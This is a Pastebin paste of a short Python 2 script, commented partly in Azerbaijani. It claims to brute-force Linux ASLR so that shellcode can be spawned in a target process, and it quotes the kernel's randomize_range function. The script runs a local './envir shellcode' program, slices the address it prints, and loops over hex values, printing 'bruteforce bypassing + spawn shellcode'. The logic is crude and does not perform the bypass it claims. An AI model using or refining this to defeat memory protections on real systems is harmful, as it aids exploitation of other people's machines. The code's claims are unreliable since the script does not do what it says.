Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os
- import sys
- import subprocess
- #linux kernel ref: http://lxr.linux.no/linux+v3.7.3/drivers/char/random.c#L1446
- #28 bit randomise page offset PRNG algorithm (Pseudorandom number generator in get_random_int function return field)
- #---------------------------------------------------------------------------
- #unsigned long
- #randomize_range(unsigned long start, unsigned long end, unsigned long len)
- #{
- # unsigned long range = end - len - start;
- # if (end <= start + len)
- # return 0;
- # return PAGE_ALIGN(get_random_int() % range + start);
- #}
- #---------------------------------------------------------------------------
- #bu kodu C-de target prosesde (spawn addr: envir_shellcode) threat execute ede bilersiniz. men algonu verirem sadece
- #hex_list = ["0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"]
- p = subprocess.Popen("./envir shellcode", stdout=subprocess.PIPE, shell=True)
- (output, err) = p.communicate()
- aslr=output[4:7]
- print 'spawn shellcode :S testinG!!!@@@@3 @st1ll_di3--->'+str(output)
- for i in range (1000,4096):
- var=hex(int(i)).replace('0x','')
- cixis=var
- # print aslr
- if cixis == aslr:
- print output+'----> bruteforce bypassing + spawn shellcode dude :)'
- #0xbf<-af6->747
- #0xbf<-d9c->747
Add Comment
Please, Sign In to add comment